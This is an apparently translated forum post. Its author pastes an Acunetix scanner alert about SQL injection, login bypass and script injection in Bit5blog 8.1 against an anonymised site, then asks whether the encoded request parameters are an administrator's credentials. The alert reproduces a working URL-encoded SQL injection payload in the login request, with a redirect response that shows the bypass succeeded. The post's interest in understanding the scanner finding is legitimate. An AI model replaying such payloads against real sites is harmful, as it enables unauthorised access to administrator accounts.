Greetings and happy new year.
Dear friends, I scanned a site with Acunetix Web Vulnerability Scanner and it found several items in the alert section; I am posting one of them here, and I would be grateful if you could advise me.
Bit5blog v.8.1 SQL Injection and Login Bypass
Vulnerability description
1) Input passed to the "username" and "password" parameters in "processlogin.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed to the "comment" parameter in "addcomment.php" isn't properly sanitised before being used. This can be exploited to inject arbitrary script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.
Example: <a href="javascript:">[text]</a>
Confirmed in version 8.1. Other versions may also be affected.
This vulnerability affects /html/admin/processlogin.php.
The impact of this vulnerability
A remote user can execute SQL commands on the underlying database, bypass login sequence and inject arbitrary script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.
Attack details
No details are available.
View HTTP headers
Request
POST /html/admin/processlogin.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: ******
Content-Length: 75
Connection: Close
Pragma: no-cache
username=%27+or+isnull%281%2F0%29%2F*&password=%27+or+isnull%281%2F0%29%2F*
Response
HTTP/1.0 302 Moved Temporarily
Date: Wed, 04 Apr 2007 1915 GMT
Server: Apache Powered Server
X-Powered-By: PHP/4.3.10-19
Set-Cookie: POSTNUKESID=9784a42198ce619d7e937bf02958fadb; path=/html/admin
Expires: Thu, 19 Nov 1981 0800 GMT
Cache-Control: cache
Pragma: no-cache
Location: ******/html/admin/index.php
Content-Type: text/html
X-Cache: MISS from Cache
X-Cache-Lookup: MISS from Cache:3128
Connection: close
How to fix this vulnerability
Edit the source code to ensure that input is properly sanitised.
Web references
Secunia SA18464
Product Homepage
I will post a few more items later. In this material there is a part that refers to a user and pass; do these belong to the administrator, and do they need to be decoded??
username=%27+or+isnull%281%2F0%29%2F*&password=%27+or+isnull%281%2F0%29%2F*
I have replaced the site name with ******.
Thank you for your guidance.